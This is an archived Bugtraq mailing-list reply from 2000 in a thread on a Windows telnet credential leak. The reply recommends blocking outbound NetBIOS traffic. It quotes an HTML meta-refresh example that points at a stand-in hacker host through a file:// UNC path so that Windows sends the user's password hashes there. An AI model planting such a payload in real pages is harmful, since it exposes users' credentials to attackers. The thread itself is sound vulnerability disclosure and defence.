Bugtraq mailing list archives
Re: Win2k Telnet.exe malicious server vulnerability
From: Bronek Kozicki <brok () RUBIKON PL>
Date: Fri, 15 Sep 2000 20:10:38 +0200
From: "Ryagin Mihail Yurevitch" <ryagin () EXTRIM RU>
The problem is far more general then within single poor configuration
defaults in telnet.exe.
The main problem is that Windows automatically supply user credentials in
many situations without ever asking for his opinion.
For example, the following html file:
<meta http-equiv="refresh"
content="5;URL=file://\\www.hackers_site.com\test.txt">
will automatically connect to evil site thru netbios and supply user
password hashes.
Putting malicious site into 'Restricted Zone' doesn't helps.
That's why, exactly, you do not pass NetBIOS through your firewall - incoming as well as _outgoing_ traffic. Kind regards B.
Current thread:
- Win2k Telnet.exe malicious server vulnerability monti (Sep 13)
- Re: Win2k Telnet.exe malicious server vulnerability Jim Paris (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Micah Webner (Sep 14)
- <Possible follow-ups>
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability monti (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Tim Hollebeek (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Blue Boar (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Рягин Михаил Юрьевич (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
- Re: Win2k Telnet.exe malicious server vulnerability J Edgar Hoover (Sep 18)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
